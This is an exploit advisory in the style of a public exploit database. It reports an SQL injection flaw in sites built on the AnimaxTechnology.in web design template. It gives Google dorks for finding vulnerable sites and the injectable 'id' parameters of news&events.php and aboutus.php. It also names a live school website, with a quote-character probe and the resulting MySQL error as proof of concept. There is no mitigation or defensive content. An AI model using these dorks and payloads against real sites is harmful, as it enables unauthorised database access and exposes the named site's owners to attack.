############################################################## # Exploit Title : AnimaxTechnology.in India Web Design 1.0 SQL Injection # Author [ Discovered By ] : KingSkrupellos # Date : 30/12/2018 # Vendor Homepage : animaxtechnology.in # Tested On : Windows and Linux # Exploit Risk : Medium # Version Information : Apache 2.4.33 - OpenSSL 1.0.2o # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # CXSecurity : cxsecurity.com/ascii/WLB-2018050298 ############################################################## Powered by AnimaxTechnology.in India SQL Injection Vulnerability ############################################################## # Google Dork : intext:''Powered by Animaxtechnology.in'' # Google Dork : intext:''A(c) 2018 Animax Technology'' # Exploit : /news&events.php?id=[SQL Injection] # Exploit : /aboutus.php?id=[SQL Injection] ############################################################## # Example Site => abhinavpublicschoolrohini.com/aboutus.php?id=1%27 [ Proof of Concept for SQL Injection ] => archive.is/ONpCK # SQL/DB Error : select * from tbl_aboutus where id='1'' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1' ############################################################## # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ##############################################################